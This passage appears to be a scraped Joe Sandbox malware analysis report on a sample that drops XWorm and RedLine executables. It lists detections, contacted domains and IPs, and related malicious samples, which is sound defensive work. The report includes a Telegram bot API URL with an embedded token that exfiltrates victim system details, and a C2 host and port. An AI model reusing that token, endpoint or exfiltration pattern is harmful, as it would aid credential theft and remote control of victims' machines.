                            C:\Users\user\AppData\Local\Temp\YsrQekGS.exe100%AviraTR/Spy.Gen
                            C:\Users\user\AppData\Local\Temp\YsrQekGS.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\YsrQekGS.exe92%ReversingLabsByteCode-MSIL.Backdoor.XWorm
                            C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe0%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe96%ReversingLabsByteCode-MSIL.Infostealer.RedLine

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            http://schemas.mic0%URL Reputationsafe
                            https://contoso.com/License0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                            http://tempuri.org/0%URL Reputationsafe
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                            https://contoso.com/0%URL Reputationsafe
                            https://nuget.org/nuget.exe0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            http://nuget.org/NuGet.exe0%URL Reputationsafe
                            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe
                            http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
                            https://contoso.com/Icon0%URL Reputationsafe
                            https://www.ecosia.org/newtab/0%URL Reputationsafe
                            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2004/08/addressing0%URL Reputationsafe
                            http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
                            https://aka.ms/pscore680%URL Reputationsafe
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
                            http://schemas.xmlsoap.org/soap/actor/next0%URL Reputationsafe
                            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
                            http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX0%Avira URL Cloudsafe
                            https://api.telegram.org/bot0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/EnvironmentSettings0%Avira URL Cloudsafe
                            45.88.186.180%Avira URL Cloudsafe
                            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
                            https://api.telegram.org0%Avira URL Cloudsafe
                            https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=667840%Avira URL Cloudsafe
                            http://pst-child.gl.at.ply.gg:93360%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/VerifyUpdateResponse0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/SetEnvironment0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/GetUpdates0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/VerifyUpdate0%Avira URL Cloudsafe
                            https://api.ipify.orgcookies//settinString.Removeg0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/SetEnvironmentResponse0%Avira URL Cloudsafe
                            pst-child.gl.at.ply.gg:93360%Avira URL Cloudsafe
                            http://tempuri.org/00%Avira URL Cloudsafe
                            http://crl.micft.cMicRosof0%Avira URL Cloudsafe
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                            https://ipinfo.io/ip%appdata%0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/CheckConnectResponse0%Avira URL Cloudsafe
                            https://api.ip.sb/geoip%USERPEnvironmentROFILE%0%Avira URL Cloudsafe
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
                            https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.60%Avira URL Cloudsafe
                            https://api.ip.sb0%Avira URL Cloudsafe
                            http://crl.mic0%Avira URL Cloudsafe
                            https://github.com/Pester/Pester0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/CheckConnect0%Avira URL Cloudsafe
                            http://pst-child.gl.at.ply.gg:9336/0%Avira URL Cloudsafe
                            https://ion=v4.50%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/GetUpdatesResponse0%Avira URL Cloudsafe
                            http://tempuri.org/Endpoint/EnvironmentSettingsResponse0%Avira URL Cloudsafe
                            http://pst-child.gl.at.ply.gg0%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            pst-child.gl.at.ply.gg
                            		147.185.221.20
                            		truetrue
                              		unknown
                              api.telegram.org
                              		149.154.167.220
                              		truetrue
                                		unknown
                                api.ip.sb
                                		unknown
                                		unknowntrue
                                  		unknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  45.88.186.18true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  pst-child.gl.at.ply.gg:9336true
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=6678411703&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA15D1E2A246FDDBBF74C%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%2042ZXX86W9%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://pst-child.gl.at.ply.gg:9336/false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabwjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.micpowershell.exe, 0000000D.00000002.1800097184.00000205807EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://duckduckgo.com/ac/?q=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.orgYsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.org/botEkpb7jn7mf.exe, 00000000.00000003.1664010699.0000000003FCE000.00000004.00000020.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000000.1666725019.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe.0.drtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/faultXwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://pst-child.gl.at.ply.gg:9336wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/EnvironmentSettingswjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.telegram.org/bot6973607627:AAGW_Zx412oiEhjCq5cqO_ZHLESeW8b4re4/sendMessage?chat_id=66784YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmptrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://contoso.com/Licensepowershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/envelope/wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/VerifyUpdateResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/SetEnvironmentwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/SetEnvironmentResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/GetUpdateswjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.ipify.orgcookies//settinString.RemovegwjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drtrue
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://contoso.com/powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://nuget.org/nuget.exepowershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/VerifyUpdatewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://tempuri.org/0wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://crl.micft.cMicRosofpowershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, YsrQekGS.exe, 00000004.00000002.2912640995.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://ipinfo.io/ip%appdata%wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 0000000A.00000002.1759686805.000002174EF13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icowjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymouswjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://tempuri.org/Endpoint/CheckConnectResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.datacontract.org/2004/07/wjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://api.ip.sb/geoip%USERPEnvironmentROFILE%wjoqZlIS.exe, 00000002.00000000.1666359805.0000000000902000.00000002.00000001.01000000.00000008.sdmp, wjoqZlIS.exe.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.ip.sbwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://crl.micpowershell.exe, 0000000D.00000002.1800097184.00000205807C1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://contoso.com/Iconpowershell.exe, 0000000D.00000002.1896915778.00000205F7F64000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://tempuri.org/Endpoint/CheckConnectwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.ecosia.org/newtab/wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/Pester/Pesterpowershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ac.ecosia.org/autocomplete?q=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2004/08/addressingwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ion=v4.5powershell.exe, 0000000A.00000002.1768144280.00000217574C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://tempuri.org/Endpoint/GetUpdatesResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000A.00000002.1739488463.000002173F0C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E8118000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://tempuri.org/Endpoint/EnvironmentSettingsResponsewjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://pst-child.gl.at.ply.ggwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002D4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://aka.ms/pscore68powershell.exe, 0000000A.00000002.1739488463.000002173EEA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1803205726.00000205E7EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003D84000.00000004.00000800.00020000.00000000.sdmp, wjoqZlIS.exe, 00000002.00000002.1838174434.0000000003DDD000.00000004.00000800.00020000.00000000.sdmp, tmpFC87.tmp.2.dr, tmp331E.tmp.2.dr, tmpFCCA.tmp.2.dr, tmpFCDA.tmp.2.dr, tmpC5B6.tmp.2.dr, tmpFC77.tmp.2.dr, tmp3350.tmp.2.dr, tmp333F.tmp.2.dr, tmpFCA9.tmp.2.dr, tmpFC98.tmp.2.dr, tmpFCAA.tmp.2.dr, tmp332F.tmp.2.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/actor/nextwjoqZlIS.exe, 00000002.00000002.1819886005.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    149.154.167.220
                                    		api.telegram.orgUnited Kingdom
                                    		62041TELEGRAMRUtrue
                                    45.88.186.18
                                    		unknownNetherlands
                                    		34962ANONYMIZEEpikNetworkCHtrue
                                    147.185.221.20
                                    		pst-child.gl.at.ply.ggUnited States
                                    		12087SALSGIVERUStrue

                                    General Information

                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1474423
                                    Start date and time:2024-07-16 21:06:08 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 27s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:19
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Ekpb7jn7mf.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:4CE2C0836C46C61B588972B56A23D5E2.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@15/57@3/3
                                    EGA Information:
                                    • Successful, ratio: 66.7%
                                    HCA Information:
                                    • Successful, ratio: 99%
                                    • Number of executed functions: 110
                                    • Number of non-executed functions: 94
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                    • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7380 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7720 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • VT rate limit hit for: Ekpb7jn7mf.exe

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    15:07:04API Interceptor30x Sleep call for process: powershell.exe modified
                                    15:07:08API Interceptor48x Sleep call for process: wjoqZlIS.exe modified
                                    15:07:26API Interceptor2976867x Sleep call for process: YsrQekGS.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    149.154.167.220Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      rVesselSchedule.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        bodrum_buro.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          Proforma fatura.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                            New order 01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                              https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                rTransaction_ReceiptCopy.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                  Brnesde.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                    NewOrder_LCL240887.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                      Makrokdernes.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                        147.185.221.20real-al-d7ya.exeGet hashmaliciousXWormBrowse
                                                          WindowsHealthProtect.exeGet hashmaliciousXWormBrowse
                                                            Ym9RghQJbG.exeGet hashmaliciousNjratBrowse
                                                              $77wsappx.exeGet hashmaliciousSilverRatBrowse
                                                                Nursultan Crack Minecraft 1.16.5.exeGet hashmaliciousXWormBrowse
                                                                  setup.exeGet hashmaliciousBlank Grabber, Njrat, Umbral Stealer, XWormBrowse
                                                                    Antilose 2.0.exeGet hashmaliciousXWormBrowse
                                                                      Realtek HD Audio Universal Service.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                        dllhost.exeGet hashmaliciousXWormBrowse
                                                                          #U666e.#U901a.#U53d1.#U7968.#U52a9#U624b#U518c.exeGet hashmaliciousUnknownBrowse

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            api.telegram.orgRevised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            rVesselSchedule.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            bodrum_buro.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Proforma fatura.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            New order 01.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            https://choicesfdc.com.au/readm.html?colors=c2FyYS5nZWlnZXJAc2JhZmxhLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            rTransaction_ReceiptCopy.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            Brnesde.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
                                                                            NewOrder_LCL240887.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 149.154.167.220
